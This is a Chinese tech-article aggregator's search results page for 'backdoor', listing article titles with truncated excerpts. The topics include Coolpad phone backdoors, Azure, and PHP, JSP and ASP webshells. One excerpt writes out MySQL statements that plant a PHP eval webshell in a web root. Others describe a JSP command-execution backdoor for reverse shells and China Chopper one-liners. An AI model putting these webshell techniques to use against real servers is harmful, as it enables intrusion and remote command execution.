码迷,mamicode.com
首页 >  
搜索关键字:后门    ( 666个结果
Microsoft Azure Web Sites应用与实践【4】—— Microsoft Azure网站的“后门”
对Microsoft Azure 网站而言, 用户能控制的主要是自身应用的数据和文件, 而服务器系统或其他更底层的配置对我们来说像个黑盒。 这本是基于PAAS的设计,因为这样我们可以将重点放在应用上而不用担心底层平台。也许有时候难免有些好奇:要是想多了解一些Microsoft Azure网站所在的“...
分类:Web程序   时间:2014-12-30 13:08:57    阅读次数:132
MySQL/ACCESS导出一句话拿WebShell后门命令
MySQL:DropTABLEIFEXISTStemp;//如果存在temp就删掉CreateTABLEtemp(cmdtextNOTNULL);//建立temp表,里面就一个cmd字段InsertINTOtemp(cmd)VALUES(<?phpeval($_POST[cmd]);?>);//把一句话木马插入到temp表SelectcmdfromtempintooutfileF:/wwwroot/eval.php;//查询temp表..
分类:数据库   时间:2014-12-24 06:30:25    阅读次数:237
Hook
(1)屏蔽本程序的鼠标信息和特定按键信息。设置后门按键F2可退出程序。HHOOKg_hKeyBoard; HHOOKg_hMouse; LRESULTCALLBACKMouseProc( _In_intnCode, _In_WPARAMwParam, _In_LPARAMlParam ) { return1;//屏蔽鼠标消息 } LRESULTCALLBACKKeyboardProc( _In_intcode, _In..
分类:其他好文   时间:2014-12-23 06:47:37    阅读次数:182
(转载)酷派把用户手机当肉鸡,非一天两天
摘要 : 酷派被国外安全研究公司Palo Alto发现在用户的手机里内置后门恶意软件,通过推送伪造OTA软件升级来安装用户不想要的应用,国内白帽子黑客发现酷派一个在线管理平台专门负责往用户的手机上悄悄推送和安装应用程序文/柳华芳北京的夜晚,黑漆漆的一片,黑夜给了我们黑色的眼睛,我们去抓住黑手,看到酷...
分类:移动开发   时间:2014-12-20 18:08:30    阅读次数:209
研究人员发现绝大部分酷派(Coolpad)手机暗藏后门(转)
隐私问题被曝光得越来越多,随着物联网的发展,只会变得越来越严重,不过从当前看来 ,国人对隐私的重视度还远没有国外,期待加强对隐私的保护策略。 转自:http://www.freebuf.com/news/54486.html 网络安全公司Palo Alto披露,酷派安卓设备上存在搜集用户隐私数据的恶...
分类:移动开发   时间:2014-12-20 18:03:54    阅读次数:193
强大的PHP一句话后门
强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。1.利用404页面隐藏PHP小马: 1 2 3 404 Not Found 4 5 Not Found ...
分类:Web程序   时间:2014-12-20 16:51:04    阅读次数:301
jsp小后门
转自 http://zone.wooyun.org/content/17356 园长一:执行系统命令:无回显执行系统命令:请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,用来反弹个shell很方便。有回显带密码验证的:").....
分类:Web程序   时间:2014-12-18 15:06:04    阅读次数:430
对几款网络抓包工具的评测
对几款网络抓包工具的评测 by 拉登哥哥 最近在写个CMD远控 写着写着 想在服务端上做点手脚 都知道杀软误报 特别是黑软大部分都报毒 但实际上是正常的 对此可能部分人并不装杀软 基本上靠自己分析软件是否安全 1 低级点的 用相关工具 检测不能真的完全保证程序无毒  也没啥技术含量   原因是 可能你正在检测时 后门没激活(比如 我设置晚上12点才向外连接等)   你在白天或其...
分类:其他好文   时间:2014-12-16 11:46:45    阅读次数:173
关于asp、php,jps一句话木马--中国菜刀使用
工具下载地址:http://pan.baidu.com/s/1o6jxAgq这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp的。 第一个,来看zzzeva免fso的cmd.asp 代码如下:<formmethod="post"> <inputtype=textname="cmd"size=60>..
分类:Web程序   时间:2014-12-15 06:37:08    阅读次数:1439
如何防止中国菜刀后门泄露webshell地址
通过本地中转可以很好地防止带后门的菜刀窃取webshell。PHP代码如下所示,原理自行思考,不懂的请留言 <?php $webshell="http://www.victim.com/webshell.php";//把这里改成你的shell地址 $temp=$_POST; $data = $temp; $data = http_build_query($data); $...
分类:Web程序   时间:2014-11-30 00:30:51    阅读次数:659
666条   上一页 1 ... 60 61 62 63 64 ... 67 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!